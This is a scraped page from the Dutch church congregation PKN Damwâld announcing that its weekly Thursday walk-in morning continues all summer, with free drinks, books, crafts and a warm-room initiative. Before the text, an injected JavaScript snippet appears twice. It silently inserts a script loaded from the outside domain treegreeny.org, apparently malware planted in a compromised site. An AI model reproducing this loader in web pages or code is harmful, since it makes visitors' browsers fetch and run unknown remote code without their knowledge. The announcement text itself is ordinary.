;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Inloopochtend It Trefpunt gaat de hele zomer door! - PKN Damwâld

Inloopochtend It Trefpunt gaat de hele zomer door!

Gepubliceerd op: vrijdag 7 juli

Elke  donderdagmorgen is er in de hal van de Ontmoeting, Foarwei 48 in Damwâld,  inloop vanaf 9.30 uur. In 2016 zijn wij hiermee gestart en er is steeds veel belangstelling. Iedereen oud en jong en kerkelijk of niet is van harte welkom. Er is gratis koffie/thee/fris en u kunt er de krant lezen, spelletjes doen of gezellig met elkaar praten. Er zijn veel boeken om te lezen die u, als u die nog niet uit hebt, mee kunt nemen naar huis. U mag ook uw eigen boeken inleveren. Er liggen tijdschriften en encyclopedieën om in te kijken. Regelmatig is er tijd voor het maken van bloemstukjes of gaan we met z’n allen iets gezelligs doen. Mocht er kapotte spullen zijn, en als dat financieel moeilijk is om die te laten maken, kunnen we adviseren en hulp regelen.
We willen meegaan met het initiatief warme woonkamers. Daarvoor bent u welkom voor een kop koffie of een sociaal gesprek of in de winterperiode om thuis de verwarming even wat lager te zetten. Er staat een pot voor een vrijwillige bijdrage.

Contactpersoon P. Huizenga Ds. Germswei 29, 06-12293838